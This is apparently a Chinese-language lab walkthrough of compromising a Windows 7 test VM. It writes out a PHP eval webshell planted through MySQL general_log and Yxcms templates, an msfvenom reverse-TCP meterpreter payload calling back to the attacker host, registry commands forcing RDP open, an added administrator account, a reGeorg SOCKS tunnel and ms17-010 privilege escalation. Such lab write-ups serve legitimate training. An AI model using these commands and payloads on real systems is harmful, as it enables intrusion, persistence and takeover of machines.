实验环境:
win7靶机:192.168.42.128
攻击机kali2020:192.168.42.129
0x01、信息收集
Nmap扫描开放的端口
Namp -sV 192.168.42.128
data:image/s3,"s3://crabby-images/80756/8075664244d6549fbb88609ead73ca9dbd4ecaa8" alt="1.jpg"
继续对80端口进行信息收集
data:image/s3,"s3://crabby-images/b5b21/b5b213d7ecf27c6efedabfe0db3028e89bcda3e7" alt="2.jpg"
发现了phpinfo.php文件和phpMyAdmin
data:image/s3,"s3://crabby-images/93750/93750ed96a3c66e908b7d820801d92efeb66bb90" alt="3.jpg"
访问phpinfo.php发现www根目录的位置
访问phpmyadmin,使用弱口令root,root成功进入后台
data:image/s3,"s3://crabby-images/05d3e/05d3e4cd34f6c9787c3d1599ec2c57644232e4f4" alt="4.jpg"
这里可以看到mysql的版本和apache服务器的一些信息
0x02、利用phpmyadmin日志文件getshell
执行SHOW VARIABLES LIKE 'secure_file_priv'
查看该站点是否有写入权限
data:image/s3,"s3://crabby-images/bec2a/bec2ab7666d8c3f897dad3b3cbabb2478e099813" alt="5.jpg"
secure_file_priv的值为null,说明mysql不允许导入导出
执行 SHOW VARIABLES LIKE '%general_log%'
查看日志文件的相关信息
data:image/s3,"s3://crabby-images/4e63a/4e63ad4ac87cb47ae5f32fb5109dcfe89bb969ec" alt="6.jpg"
可以看到日志为关闭状态,我们需要开启日志,并且更换日志路径
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/log.php';
data:image/s3,"s3://crabby-images/d6614/d6614b81f0e69083718c16c33790e5c299e9e127" alt="7.jpg"
data:image/s3,"s3://crabby-images/57292/5729215b8d3e4d0d714f67761d3d931002226f79" alt="8.jpg"
data:image/s3,"s3://crabby-images/08650/08650c2f7fcd0d0650c49818e48481164fc24400" alt="9.jpg"
执行SQL语句,写入一句话木马
SELECT '<?php @eval($_POST["obse"]);?>';
data:image/s3,"s3://crabby-images/9833e/9833e88afa5ffd0c3e785504918b51a75640f198" alt="10.jpg"
查看木马是否可用
data:image/s3,"s3://crabby-images/5c9ed/5c9ed969feadcb5921f698e6dced9dec4684cc63" alt="11.jpg"
0x03、利用Yxcms来getshell
目标机上存在已知cms
data:image/s3,"s3://crabby-images/9b14e/9b14e74b10b38c87151aca3f16f0ee1147ee91a5" alt="12.jpg"
进入后台登录界面
data:image/s3,"s3://crabby-images/85666/85666b4c20893f807b27fba2d1c436da887fc306" alt="13.jpg"
利用phpmyadmin查看admin密码
data:image/s3,"s3://crabby-images/9f998/9f99868db75237ae7a448f46cd13c2ee5800088f" alt="14.jpg"
尝试对密码进行md5解密
data:image/s3,"s3://crabby-images/273b1/273b1b48509a5659f381ddf99396346a741502fe" alt="15.jpg"
data:image/s3,"s3://crabby-images/aa572/aa57225e36e2b0215632f454197548f9d2c35fc6" alt="16.jpg"
解密失败,看来不一定是md5加密
百度得到yxcms后台默认管理员密码123456,然后进入后台
data:image/s3,"s3://crabby-images/0d9d7/0d9d7c5f11e944f6b104d6d17b775279056247c3" alt="17.jpg"
通过前台模板插入木马文件
data:image/s3,"s3://crabby-images/076b2/076b277735b137c0bc564ae78a1af0c8be009d0b" alt="18.jpg"
data:image/s3,"s3://crabby-images/f9a47/f9a4746670a6d63574cec0a52a409c27ba1a5d57" alt="19.jpg"
注意木马文件所在位置
data:image/s3,"s3://crabby-images/6419e/6419e9ae2f1d86a3f88a189d4b08e0714f0544eb" alt="20.jpg"
yxcms下有protected和public两个目录,经过一番寻找,最终发现木马位置
data:image/s3,"s3://crabby-images/97396/97396624d0afcf09b77f0d3a8d1e23537f026efa" alt="21.jpg"
0x04、getshell后的一些操作
用蚁剑连上shell
data:image/s3,"s3://crabby-images/c4385/c4385e2edb5428fca34998a91a66cf4b6ed1017a" alt="22.jpg"
蚁剑的虚拟终端不是很好用,个人还是比较喜欢用msf中的会话
用msf生成exe木马,创建一个终端会话,php马也可以,不过我这里我这里不知道是什么原因,php马总是掉
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -e x86/shikata_ ga_nai -i 5 -f exe > 123.exe
data:image/s3,"s3://crabby-images/7b91f/7b91f2988ab94295ae2f1ee7954615536843e374" alt="23.jpg"
尝试用终端强行开启3389端口,然后使用远程桌面连接
进入shell后,为了防止乱码,再输入chcp 65001
来更改编码方式
data:image/s3,"s3://crabby-images/9bd88/9bd882d81dedf7ba79c12d91976b83a020ff837f" alt="24.jpg"
查看3389端口是否开启
netstat -ano
data:image/s3,"s3://crabby-images/bd8c4/bd8c4fc89f4c52a54c352c2d1ecdaf39727568b5" alt="25.jpg"
可以看到3389端口未开启
强行开启3389端口
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
data:image/s3,"s3://crabby-images/9e7ff/9e7ff58dc0ee744d2f096c91f84807257eec2e63" alt="26.jpg"
data:image/s3,"s3://crabby-images/5d261/5d261dc0b5c510e82ef789c45cbf841abda7fa3e" alt="27.jpg"
命令行添加windows用户并加入administrators组
net user obse Password@007 /add
net localgroup administrators obse /add
data:image/s3,"s3://crabby-images/e1b75/e1b75ba9afb06ec27ed5dff20c1a209b9e5bbaec" alt="28.jpg"
尝试远程桌面连接
data:image/s3,"s3://crabby-images/222a0/222a0d4bff5eaa9dde722e25d32316b25e41f81f" alt="29.jpg"
应该是设置了什么策略,所以我们没法成功连接
如果是真实的渗透,建议使用代理工具代理流量,这里随便记录一下使用reGeorg开启socks5反向代理的方法
先上传tunnel.php到与shell.php同一目录下
data:image/s3,"s3://crabby-images/fa745/fa745afa32843eae97aeda8de66f7e98bcad3e90" alt="30.jpg"
访问tunnel.php如果出现以下界面则说明这个脚本可用
data:image/s3,"s3://crabby-images/9e375/9e3753f28f51675e6fc5d22a9e2eac526432cfe8" alt="31.jpg"
运行reGeorgSocksProxy.py脚本
python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://192.168.42.128/yxcms/protected/apps/default/view/default/tunnel.php
data:image/s3,"s3://crabby-images/d72f9/d72f91fadcf671303138d1b4f8c27ecbc7a6b294" alt="32.jpg"
这时就可以使用代理软件了,使用proxifier进行socks5代理
打开proxifier,在配置文件中选择代理服务器
data:image/s3,"s3://crabby-images/12701/127018c13082c89cd96308217f5206c25a97b832" alt="33.jpg"
然后在配置文件中选择代理规则
data:image/s3,"s3://crabby-images/5a5a7/5a5a7d71d4f2c53a907aa6ad54e5f2d95b657f36" alt="34.jpg"
这里应用程序本来是任意程序,这里只需要添加mstsc.exe(远程桌面连接程序)
data:image/s3,"s3://crabby-images/7417d/7417d9c3d08a7a7a21e1596f419c093de3284025" alt="35.jpg"
最后只勾选我们需要的代理就行了
然后再进行远程桌面连接就可以了
尝试提权
既然没法远程桌面连接,那就尝试提权吧
使用bypassuac进行提权
data:image/s3,"s3://crabby-images/c0418/c041817ceebf297f7040448969c56f75c79ea1ca" alt="36.jpg"
data:image/s3,"s3://crabby-images/ea476/ea4767290edcac61744818b91a6a8a47154d6fec" alt="37.jpg"
经过一番尝试,未能提权成功
使用系统漏洞提权
复制systeminfo信息到提权辅助页面:https://bugs.hacking8.com/tiquan/
data:image/s3,"s3://crabby-images/2acd5/2acd52b6e3a3d461c3011053d6a54d67071efa6b" alt="38.jpg"
查询到以下漏洞
data:image/s3,"s3://crabby-images/2a85b/2a85b3c38a56b11cbb14f163129f2bc23ad8dea3" alt="39.jpg"
search漏洞编号,利用漏洞提权
data:image/s3,"s3://crabby-images/a6379/a6379821534ffc7abbe708bad48087e04731e788" alt="40.jpg"
ms17-010可以利用
data:image/s3,"s3://crabby-images/3d7d2/3d7d26f1a2383ab016066b731599b94c4e76e66f" alt="41.jpg"
设置好参数,然后执行脚本
data:image/s3,"s3://crabby-images/20772/2077260f3b7083b46a52b0e1450a459b4a975036" alt="42.jpg"
成功提权到system